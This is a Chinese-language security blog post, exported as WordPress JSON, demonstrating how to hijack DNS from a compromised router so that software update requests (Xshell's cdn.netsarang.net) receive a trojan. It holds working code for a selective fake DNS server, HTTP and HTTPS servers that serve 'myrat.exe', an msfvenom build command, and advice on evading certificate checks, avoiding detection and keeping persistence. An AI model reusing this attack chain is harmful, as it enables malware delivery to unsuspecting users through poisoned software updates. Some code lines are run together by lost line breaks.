![\"\u52ab\u6301DNS\u901a\u8fc7\u6d41\u91cf\u690d\u5165\u6728\u9a6c\u5b9e\u4f8b\u63d2\u56fe\"](\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" "\\"\u52ab\u6301DNS\u901a\u8fc7\u6d41\u91cf\u690d\u5165\u6728\u9a6c\u5b9e\u4f8b\u63d2\u56fe\\"")
<\/p>\n\u5f88\u591a\u65f6\u5019\u5bf9\u76ee\u6807\u8fdb\u884c\u6e17\u900f\u65f6\u4e00\u822c\u4f1a\u4eceweb\u3001\u7f51\u7edc\u8bbe\u5907\u3001\u9488\u5bf9\u6027\u9493\u9c7c\u8fd9\u4e09\u4e2a\u65b9\u5411\u5165\u624b\u3002\u5047\u8bbe\u6211\u4eec\u63a7\u5236\u4e86\u76ee\u6807\u7f51\u7edc\u4e2d\u7684\u4e00\u53f0\u7f51\u7edc\u8bbe\u5907\uff0c\u5982\u8def\u7531\u5668\uff0c\u5185\u7f51\u7528\u6237\u6d41\u91cf\u4f1a\u4ece\u8fd9\u4e2a\u5730\u65b9\u7ecf\u8fc7\u6211\u4eec\u600e\u4e48\u83b7\u53d6\u5176\u6743\u9650\u5462 \uff1f<\/b><\/p>\n
\u8fd9\u79cd\u65f6\u5019\u53ef\u4ee5\u5728\u8def\u7531\u5668\u4e0a\u6293\u5305\u5206\u6790\u7528\u6237\u6d41\u91cf\uff0c\u6bd4\u5982\u542f\u52a8xshell\u3001notepad++\u7b49\u8f6f\u4ef6\u65f6\u53d1\u9001\u7684\u66f4\u65b0\u8bf7\u6c42\u5305\uff0c\u7136\u540e\u6211\u4eec\u66ff\u6362\u8f6f\u4ef6\u66f4\u65b0\u7684http\u54cd\u5e94\u5305\u8fbe\u5230\u690d\u5165\u6728\u9a6c\u76ee\u7684\u3002<\/p>\n
\u5206\u6790\u6d41\u91cf\u4e00\u822c\u7528tcpdump\uff0c\u5982\u679c\u53ea\u6709\u8def\u7531\u5668\u540e\u53f0\u6743\u9650\u6ca1\u6709\u5730\u65b9\u53ef\u4ee5\u6267\u884c\u547d\u4ee4\u7684\u8bdd\u53ef\u4ee5\u7528DNS\u670d\u52a1\u5668\u914d\u5408HTTP\u4ee3\u7406\u6765\u622a\u83b7\u6d41\u91cf\u3002<\/p>\n
<\/p>\n
\u8fd9\u91cc\u5c31\u6f14\u793a\u4e00\u4e0b\u53bb\u52ab\u6301\u8f6f\u4ef6\u66f4\u65b0\u670d\u52a1\u5668\u8fbe\u5230\u690d\u5165\u6728\u9a6c\u7684\u76ee\u7684<\/p>\n
<\/p>\n
\u4e3a\u4e86\u65b9\u4fbf\u6f14\u793a\u8fd9\u91cc\u5c06\u53d7\u5bb3\u8005\u673a\u5668\u4e0a\u7684DNS\u6539\u4e3a\u653b\u51fb\u8005IP<\/p>\n
<\/p>\n
\u4e0b\u8f7dsqlmap\u9879\u76ee\u63d0\u53d6sqlmap\\sqlmap-stable\\lib\\request\u76ee\u5f55\u4e2d\u7684dns.py<\/p>\n
\u6267\u884c\u770b\u770b\u6548\u679c<\/p>\n
<\/p>\n
\u5728\u7528\u6237\u673a\u5668\u4e0aping\u4e86\u4e00\u4e0b\uff0cDNS\u670d\u52a1\u5668\u8fd9\u8fb9\u5df2\u7ecf\u6210\u529f\u63a5\u6536\u57df\u540d\u89e3\u6790\u8bf7\u6c42\u5e76\u54cd\u5e94127.0.0.1<\/p>\n
\u4f46\u662f\u8fd9\u4e2a\u811a\u672c\u4e2d\u628a\u6240\u6709\u57df\u540d\u89e3\u6790\u8bf7\u6c42\u90fd\u54cd\u5e94\u6210127.0.0.1<\/p>\n
<\/p>\n
\u9700\u8981\u4fee\u6539\u4e00\u4e0b<\/p>\n
\u6211\u4eec\u7684\u9700\u6c42\u662f\u80fd\u591f\u6b63\u5e38\u89e3\u6790\u57df\u540d\uff0c\u518d\u5bf9\u67d0\u4e9b\u6307\u5b9a\u57df\u540d\u8fdb\u884c\u52ab\u6301\u3002<\/p>\n
\u4fee\u6539\u540e\u4ee3\u7801\u5982\u4e0b<\/p>\n
#!\/usr\/bin\/env python\"\"\"\nCopyright (c) 2006-2016 sqlmap developers (http:\/\/sqlmap.org\/)\nSee the file 'doc\/COPYING' for copying permission\n\"\"\"import osimport reimport socketimport threadingimport timeimport dns.resolverclass DNSQuery(object):\n \"\"\"\n Used for making fake DNS resolution responses based on received\n raw request\n Reference(s):\n http:\/\/code.activestate.com\/recipes\/491264-mini-fake-dns-server\/\n https:\/\/code.google.com\/p\/marlon-tools\/source\/browse\/tools\/dnsproxy\/dnsproxy.py\n \"\"\"\n def __init__(self, raw):\n self._raw = raw\n self._query = \"\"\n type_ = (ord(raw[2]) >> 3) & 15 # Opcode bits\n if type_ == 0: # Standard query\n i = 12\n j = ord(raw[i]) while j != 0:\n self._query += raw[i + 1:i + j + 1] + '.'\n i = i + j + 1\n j = ord(raw[i]) def response(self, resolution):\n \"\"\"\n Crafts raw DNS resolution response packet\n \"\"\"\n retVal = \"\"\n if self._query:\n retVal += self._raw[:2] # Transaction ID\n retVal += \"\\x85\\x80\" # Flags (Standard query response, No error)\n retVal += self._raw[4:6] + self._raw[4:6] + \"\\x00\\x00\\x00\\x00\" # Questions and Answers Counts\n retVal += self._raw[12:(12 + self._raw[12:].find(\"\\x00\") + 5)] # Original Domain Name Query\n retVal += \"\\xc0\\x0c\" # Pointer to domain name\n retVal += \"\\x00\\x01\" # Type A\n retVal += \"\\x00\\x01\" # Class IN\n retVal += \"\\x00\\x00\\x00\\x20\" # TTL (32 seconds)\n retVal += \"\\x00\\x04\" # Data length\n retVal += \"\".join(chr(int(_)) for _ in resolution.split('.')) # 4 bytes of IP\n return retValclass DNSServer(object):\n def __init__(self):\n self.my_resolver = dns.resolver.Resolver()\n self.my_resolver.nameservers = ['8.8.8.8']\n self._check_localhost()\n self._requests = []\n self._lock = threading.Lock() try:\n self._socket = socket._orig_socket(socket.AF_INET, socket.SOCK_DGRAM) except AttributeError:\n self._socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n self._socket.bind((\"\", 53))\n self._running = False\n self._initialized = False\n def _check_localhost(self):\n response = \"\"\n try:\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n s.connect((\"\", 53))\n s.send(\"6509012000010000000000010377777706676f6f676c6503636f6d00000100010000291000000000000000\".decode(\"hex\")) # A www.google.com\n response = s.recv(512) except: pass\n finally: if response and \"google\" in response: raise socket.error(\"another DNS service already running on *:53\") def pop(self, prefix=None, suffix=None):\n \"\"\"\n Returns received DNS resolution request (if any) that has given\n prefix\/suffix combination (e.g. prefix.<query result>.suffix.domain)\n \"\"\"\n retVal = None\n with self._lock: for _ in self._requests: if prefix is None and suffix is None or re.search(\"%s\\..+\\.%s\" % (prefix, suffix), _, re.I):\n retVal = _\n self._requests.remove(_) break\n return retVal def get_domain_A(self,domain):\n try:\n results=self.my_resolver.query(domain,'A') for i in results.response.answer: for j in i.items: try:\n ip_address = j.address if re.match('\\d+\\.+\\d+\\.+\\d+\\.+\\d', ip_address): return ip_address except AttributeError as e: continue\n except Exception as e: return '127.0.0.1'\n\n def run(self):\n \"\"\"\n Runs a DNSServer instance as a daemon thread (killed by program exit)\n \"\"\"\n def _():\n try:\n self._running = True\n self._initialized = True\n while True:\n data, addr = self._socket.recvfrom(1024)\n _ = DNSQuery(data)\n domain=_._query[:-1] ###### exploit\n ip=self.get_domain_A(domain) if domain=='cdn.netsarang.net':\n ip='192.168.80.142'\n print domain,' -> ',ip\n self._socket.sendto(_.response(ip), addr) with self._lock:\n self._requests.append(_._query) except KeyboardInterrupt: raise\n finally:\n self._running = False\n thread = threading.Thread(target=_)\n thread.daemon = True\n thread.start()if __name__ == \"__main__\":\n server = None\n try:\n server = DNSServer()\n server.run() while not server._initialized:\n time.sleep(0.1) while server._running: while True:\n _ = server.pop() if _ is None: break\n else:\n domian=_[:-1] #print \"[i] %s with A %s\" % (domian,server.get_domain_A(domian))\n time.sleep(1) except socket.error, ex: if 'Permission' in str(ex): print \"[x] Please run with sudo\/Administrator privileges\"\n else: raise\n except KeyboardInterrupt:\n os._exit(0) finally: if server:\n server._running = False<\/code><\/pre>\n\u8fd9\u4e2a\u811a\u672c\u7684\u529f\u80fd\u662f\u5c06\u7528\u6237\u7684DNS\u8bf7\u6c42\u8f6c\u53d1\u7ed9GOOGLE\u7684DNS\u670d\u52a1\u5668\u4f7f\u7528\u6237\u80fd\u591f\u6b63\u5e38\u4e0a\u7f51\uff0c\u7136\u540e\u518d\u5bf9\u6307\u5b9a\u57df\u540d\u505a\u52ab\u6301<\/p>\n
\u53ef\u4ee5\u770b\u5230\u73b0\u5728\u7528\u6237\u5df2\u7ecf\u53ef\u4ee5\u6b63\u5e38\u4e0a\u7f51\u4e86<\/p>\n
<\/p>\n
\u7136\u540e\u90e8\u7f72HTTP\u4ee3\u7406\u670d\u52a1\u5668<\/p>\n
\u4ee3\u7801\u6211\u5df2\u7ecf\u5199\u597d\u4e86<\/p>\n
# -*- coding: UTF-8 -*-import socketimport threading, getopt, sys, stringimport re#\u8bbe\u7f6e\u9ed8\u8ba4\u7684\u6700\u5927\u8fde\u63a5\u6570\u548c\u7aef\u53e3\u53f7list=50port=80file_contents=open('myrat.exe','rb').read()def req_server():\n return 'HTTP\/1.1 200 OK\\r\\nContent-Length: 303641\\r\\nContent-Type: application\/force-download\\r\\nLast-Modified: Fri, 10 Jan 2014 03:54:35 GMT\\r\\nAccept-Ranges: bytes\\r\\nETag: \"80f5adb7dcf1:474\"\\r\\nServer: Microsoft-IIS\/6.0\\r\\nX-Powered-By: ASP.NET\\r\\nDate: Thu, 24 May 2018 06:25:45 GMT\\r\\nConnection: close\\r\\n\\r\\n'+file_contents \ndef jonnyS(client, address):\n try: #\u8bbe\u7f6e\u8d85\u65f6\u65f6\u95f4\n client.settimeout(500) #\u63a5\u6536\u6570\u636e\u7684\u5927\u5c0f\n buf = client.recv(2048) print buf #\u5c06\u63a5\u6536\u5230\u7684\u4fe1\u606f\u539f\u6837\u7684\u8fd4\u56de\u5230\u5ba2\u6237\u7aef\u4e2d\n client.send(req_server()) #\u8d85\u65f6\u540e\u663e\u793a\u9000\u51fa\n except socket.timeout: print 'time out'\n #\u5173\u95ed\u4e0e\u5ba2\u6237\u7aef\u7684\u8fde\u63a5\n client.close()def main():\n #\u521b\u5efasocket\u5bf9\u8c61\u3002\u8c03\u7528socket\u6784\u9020\u51fd\u6570\n #AF_INET\u4e3aip\u5730\u5740\u65cf\uff0cSOCK_STREAM\u4e3a\u6d41\u5957\u63a5\u5b57\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #\u5c06socket\u7ed1\u5b9a\u5230\u6307\u5b9a\u5730\u5740\uff0c\u7b2c\u4e00\u4e2a\u53c2\u6570\u4e3aip\u5730\u5740\uff0c\u7b2c\u4e8c\u4e2a\u53c2\u6570\u4e3a\u7aef\u53e3\u53f7\n sock.bind(('0.0.0.0', port)) #\u8bbe\u7f6e\u6700\u591a\u8fde\u63a5\u6570\u91cf\n sock.listen(list) while True: #\u670d\u52a1\u5668\u5957\u63a5\u5b57\u901a\u8fc7socket\u7684accept\u65b9\u6cd5\u7b49\u5f85\u5ba2\u6237\u8bf7\u6c42\u4e00\u4e2a\u8fde\u63a5\n client, address = sock.accept()\n thread = threading.Thread(target=jonnyS, args=(client, address))\n thread.start()if __name__ == '__main__':\n main()<\/code><\/pre>\n\u8fd9\u91cc\u7684\u529f\u80fd\u662f\u6536\u5230\u7528\u6237\u7684HTTP\u8bf7\u6c42\u540e\u76f4\u63a5\u54cd\u5e94\u4e00\u4e2a\u4e8c\u8fdb\u5236\u6587\u4ef6\uff0c\u4e5f\u5c31\u662f\u6211\u4eec\u7684\u6728\u9a6c<\/p>\n
\u6548\u679c\u5982\u4e0b<\/p>\n
<\/p>\n
\u5f88\u591a\u8f6f\u4ef6\u66f4\u65b0\u65f6\u90fd\u8d70\u7684https\u6240\u4ee5\u6211\u4eec\u8fd8\u9700\u642d\u5efahttps\u4ee3\u7406\u670d\u52a1\u5668<\/p>\n
\u642d\u5efaHTTPS\u4ee3\u7406\u670d\u52a1\u5668<\/p>\n
\u4ee3\u7801\u5982\u4e0b<\/p>\n
import socketserver, ssl, timeclass MyHTTPSHandler_socket(socketserver.BaseRequestHandler):\n def handle(self):\n context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)\n context.load_cert_chain(certfile=\"cert.pem\")\n SSLSocket = context.wrap_socket(self.request, server_side=True)\n self.data = SSLSocket.recv(1024)\n print(self.data)\n file_contents=open('myrat.exe','rb').read()\n buf = 'HTTP\/1.1 200 OK\\r\\nContent-Length: 303641\\r\\nContent-Type: application\/force-download\\r\\nLast-Modified: Fri, 10 Jan 2014 03:54:35 GMT\\r\\nAccept-Ranges: bytes\\r\\nETag: \"80f5adb7dcf1:474\"\\r\\nServer: Microsoft-IIS\/6.0\\r\\nX-Powered-By: ASP.NET\\r\\nDate: Thu, 24 May 2018 06:25:45 GMT\\r\\nConnection: close\\r\\n\\r\\n'+file_contents\n SSLSocket.send(buf)if __name__ == \"__main__\":\n port = 443\n httpd = socketserver.TCPServer(('0.0.0.0', port), MyHTTPSHandler_socket)\n httpd.serve_forever()<\/code><\/pre>\n\u6267\u884copenssl req -new -x509 -keyout https_svr_key.pem -out https_svr_key.pem -days 3650 -nodes\u00a0 \u53ef\u4ee5\u751f\u6210\u8bc1\u4e66<\/p>\n
\u642d\u5efa\u597d\u540e\u914d\u7f6e\u6728\u9a6c\uff0c\u8fd9\u91cc\u5c31\u7528msf\u505a\u6f14\u793a<\/p>\n
msfvenom -p windows\/ -f exe -o myrat.exe<\/code><\/pre>\n\u7136\u540e\u770b\u4e00\u4e0bxshell\u7684\u66f4\u65b0\u8bf7\u6c42<\/p>\n
<\/p>\n
\u57df\u540d\u662fcdn.netsarang.net,\u770b\u4e00\u4e0b\u6d41\u91cf<\/p>\n
<\/p>\n
\u53ef\u4ee5\u770b\u5230\u662f\u8d70\u7684https<\/p>\n
\u5728dns\u670d\u52a1\u5668\u4e2d\u6dfb\u52a0\u5982\u4e0b<\/p>\n
<\/p>\n
\u67b6\u8bbehttps\u670d\u52a1\u5668<\/p>\n
<\/p>\n
\u8fd0\u884c\u811a\u672c\u548cmsf\u76d1\u542c<\/p>\n
\n<\/p>\n
\u89c6\u9891\u6548\u679c\u56fe<\/p>\n
\u603b\u7ed3<\/h2>\n
1.\u53ef\u4ee5\u9488\u5bf9firefox\u7b49\u81ea\u52a8\u66f4\u65b0\u6216\u540e\u53f0\u9759\u9ed8\u66f4\u65b0\u7684\u8fd9\u7c7b\u5e94\u7528\u7a0b\u5e8f\u8fdb\u884c\u6d41\u91cf\u66ff\u6362\uff0c\u8fd9\u6837\u6210\u529f\u7387\u4f1a\u5f88\u9ad8\u88ab\u53d1\u73b0\u53ef\u80fd\u6027\u4e5f\u5c0f<\/p>\n
2.\u5f53\u66f4\u65b0\u5305\u8bf7\u6c42\u662fhttps\u65f6\u9700\u8981\u6ce8\u610f\u8bc1\u4e66\u95ee\u9898,\u53ef\u4ee5\u5c1d\u8bd5\u5229\u7528cname\u7ed5\u8fc7\uff0c\u6bd4\u5982\u5728dns\u670d\u52a1\u5668\u4e0a\u628awww.baidu.com<\/a>\u91cd\u5b9a\u5411\u5230www.exploit.com<\/a>\uff0c\u6211\u4eec\u6709www.exploit.com<\/a>\u7684\u5408\u6cd5\u8bc1\u4e66\u8fd9\u6837\u5c31\u4e0d\u4f1a\u62a5\u9519.<\/p>\n3.\u5728\u8def\u7531\u5668\u4e0a\u4fee\u6539DNS\u4e5f\u53ef\u4ee5\u4f5c\u4e3a\u4e00\u79cd\u6301\u4e45\u6027\u63a7\u5236\u7684\u624b\u6bb5\uff0c\u67d0\u5929\u6743\u9650\u4e0d\u614e\u4e22\u5931\u4e86\uff0c\u7ee7\u7eed\u690d\u5165\u5c31\u884c\u4e86\u3002<\/p>\n","protected":false},"excerpt":{"rendered":"
\u5f88\u591a\u65f6\u5019\u5bf9\u76ee\u6807\u8fdb\u884c\u6e17\u900f\u65f6\u4e00\u822c\u4f1a\u4eceweb\u3001\u7f51\u7edc\u8bbe\u5907\u3001\u9488\u5bf9\u6027\u9493\u9c7c\u8fd9\u4e09\u4e2a\u65b9\u5411\u5165\u624b\u3002\u5047\u8bbe\u6211\u4eec\u63a7\u5236\u4e86\u76ee\u6807\u7f51\u7edc\u4e2d\u7684\u4e00\u53f0\u7f51\u7edc […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[494,493,491,492,154],"class_list":["post-968","post","type-post","status-publish","format-standard","hentry","category-net-security","tag-dns","tag-491","tag-492","tag-154"],"_links":{"self":[{"href":"https:\/\/byy3.com\/index.php?rest_route=\/wp\/v2\/posts\/968","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/byy3.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/byy3.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/byy3.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/byy3.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=968"}],"version-history":[{"count":0,"href":"https:\/\/byy3.com\/index.php?rest_route=\/wp\/v2\/posts\/968\/revisions"}],"wp:attachment":[{"href":"https:\/\/byy3.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=968"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/byy3.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=968"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/byy3.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=968"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}